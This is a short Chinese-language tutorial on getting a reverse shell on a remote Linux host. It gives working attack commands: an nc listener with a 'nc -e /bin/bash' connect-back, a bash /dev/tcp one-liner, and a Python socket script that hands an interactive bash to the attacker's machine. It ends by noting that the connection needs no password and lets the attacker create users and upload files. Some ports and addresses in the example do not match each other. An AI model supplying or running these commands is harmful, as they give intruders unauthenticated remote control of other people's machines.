使用Python和nc对远程主机进行反向shell链接

nc这个命令屌炸天，经常用作黑客工具。简单说下反向shell

2台Linux电脑

A：192.168.0.21

B：192.168.0.22

A设置nc -lv 8081

B执行nc 192.168.0.21 8080 -e /bin/bash

这样就A就可以链接上B计算机的shell

但是-e这个参数默认时候是木有的，甚者nc命令都木有，可以自己下载源代码编译一个，略麻烦

但是在目标计算机A中必然有bash

bash -i>＆ /dev/tcp/192.168.100.113/4444 0>&1

但是要自己创建socket文件，麻烦

最后使用Python写脚本

import os,socket,subprocess;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect(('192.168.0.21',8080))#重定向shell输出os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)#执行子程序p=subprocess.call(['/bin/bash','-i'])

A机器

B机器

稍微多想想，为什么我不用SSH这种东西呢？

链接时候没有使用密码0 0，可以跳过很多事情，可以创建用户，上传文件，至于怎么让目标机器执行这个代码，那办法太多了。